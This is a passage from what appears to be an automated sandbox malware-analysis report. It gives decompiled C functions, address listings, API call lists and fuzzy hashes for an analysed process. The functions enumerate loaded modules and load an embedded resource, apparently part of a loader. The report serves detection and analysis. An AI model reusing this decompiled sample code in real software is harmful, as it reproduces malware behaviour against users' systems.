							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402386
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

x, xrefs: 0040214A
*, xrefs: 00401A1F
', xrefs: 00402006
!, xrefs: 0040201A
), xrefs: 0040202E
0, xrefs: 00401BBD
v, xrefs: 00401E4B
x, xrefs: 00402088
!, xrefs: 00401B1E
o, xrefs: 00402159
o, xrefs: 00401B8D
h, xrefs: 00401A6F
8, xrefs: 00401BA9
v, xrefs: 0040206A
V, xrefs: 00401E19
5, xrefs: 00402109
U, xrefs: 004020F5
", xrefs: 00401B0F
W, xrefs: 004020E6
!, xrefs: 004020CF
[, xrefs: 00402047
x, xrefs: 00401B78
_._, xrefs: 00402257
%, xrefs: 004020FA
W, xrefs: 00401B14
{, xrefs: 00401E3C
4, xrefs: 00402074
4, xrefs: 00401B64
4, xrefs: 00402136
D, xrefs: 00401DFB
x, xrefs: 00401E69
{, xrefs: 00401B4B
:, xrefs: 00401B28
{, xrefs: 0040211D
*, xrefs: 004020E1
v, xrefs: 0040212C
', xrefs: 00401AF6
{, xrefs: 0040205B
[, xrefs: 00401B37
v, xrefs: 00401B5A
., xrefs: 00401B0A
W, xrefs: 00402033
E, xrefs: 00401E0F
___, xrefs: 0040227D
V, xrefs: 00402038
6, xrefs: 004020C5
W, xrefs: 00401B23
., xrefs: 0040201F
o, xrefs: 00402097

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 2e0dd72ec8d439375dd02635da563a1ff5f1e7df9f47103eeeb3d78115d78ec3
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 2e0dd72ec8d439375dd02635da563a1ff5f1e7df9f47103eeeb3d78115d78ec3
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 06B00E44, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345f687f9e351c42560f20ba51011ea9f410fc82ed223a4f56d958b7c842bde0
Instruction ID: 11e8976d2ccb3f7bbc9c9c8a3bd84459c3fa21d72272a06c758256879c00f5db
Opcode Fuzzy Hash: 345f687f9e351c42560f20ba51011ea9f410fc82ed223a4f56d958b7c842bde0
Instruction Fuzzy Hash: DDE1FE70B043449FD719AB78D858A6E7FABEFC5214B1488A9E406DB391DF30DC42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06B08F48, Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.459069669.0000000006B00000.00000040.00000001.sdmp, Offset: 06B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675a37cefad4b7bb130863c2200c3c33bce1043d46b20ed15441563d9cd37283
Instruction ID: 84d6d450e9828b8be7dba650b60920c737bb7bc063181a86a5792ba46b36ccca
Opcode Fuzzy Hash: 675a37cefad4b7bb130863c2200c3c33bce1043d46b20ed15441563d9cd37283
Instruction Fuzzy Hash: D6C1C670B00606AFEB94EF61D58466ABBA6FF84304F40DCA8D5178B2A5DB70E845CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 02A00CA8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 02A00D0F

Memory Dump Source

Source File: 00000016.00000002.443018943.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: false

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 98468a0e580498eddfdc6dc8f2b123925cec6fda59255f5e37076bc965fbc117
Instruction ID: 8a918c9c3475069425b64f0b1f0750474714a2a56df37e9fb7939d1762acee4a
Opcode Fuzzy Hash: 98468a0e580498eddfdc6dc8f2b123925cec6fda59255f5e37076bc965fbc117
Instruction Fuzzy Hash: 43115871D007498FCB10DFA9D9857EFBBF0AB48328F248829C015B7280DB79A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A00CB0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 02A00D0F

Memory Dump Source

Source File: 00000016.00000002.443018943.0000000002A00000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: false

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: fb77a0f9815aadc5e0622d052fb56cd54aede29d552925a5ca1b948766763265
Instruction ID: dd5e39a414da125c3eae8569ae44c4010513e95fc50b1d8df9681741c03128ea
Opcode Fuzzy Hash: fb77a0f9815aadc5e0622d052fb56cd54aede29d552925a5ca1b948766763265
Instruction Fuzzy Hash: FF113671D007088FCB14DFA9D9857DFFBF4AB48328F248829C519A7240DB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02636F96, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02636FDE

Memory Dump Source

Source File: 00000016.00000002.441199080.0000000002636000.00000040.00000001.sdmp, Offset: 02636000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2c2c75568d3f4e0c02e965ca7af5fea0b2702529abae37b17341b60d1ce8253b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: FAF062351007117BD7213AF5D98CB6AB6EDFF49625F10052CE647D21C0DB70E8454A65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
